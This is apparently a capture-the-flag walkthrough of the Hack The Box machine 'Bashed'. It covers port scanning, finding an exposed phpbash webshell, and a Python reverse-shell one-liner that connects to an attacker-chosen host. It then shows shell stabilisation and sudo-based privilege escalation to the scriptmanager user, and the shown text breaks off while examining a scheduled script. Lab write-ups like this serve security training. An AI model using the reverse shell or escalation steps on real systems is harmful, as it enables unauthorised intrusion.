naabu -host bashed.htb -v
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80
Open ports:
port 80 web
Visiting the webpage present us with phpbash software , after some googling and poking around it is found that phpbash is a webshell so , the dev might left it somewhere on the website to allow us to execute RCE ?
/dev seems sus , visiting the webpage show us two php files
phpbash.php
phpbash.min.php
Foothold
Multiple reverse shells attempt have been made but this works
export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Get Stable Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL + Z (go background in linux)
stty raw -echo;fg (get shell and return to session)
press ENTER to get shell
Checks
id
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Priv Esc
Cool , user scriptmanager can run anything
sudo -u scriptmanager /bin/bash
config.php
cat config.php
<?php
//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com"; //<-- Your email
?>
No creds found sadly
/scripts was found on root directory
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Aug 23 08:29 scripts
Contents of the folder
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root root 12 Aug 23 08:29 test.txt
First glance looks like the file auto run and output to test.txt ?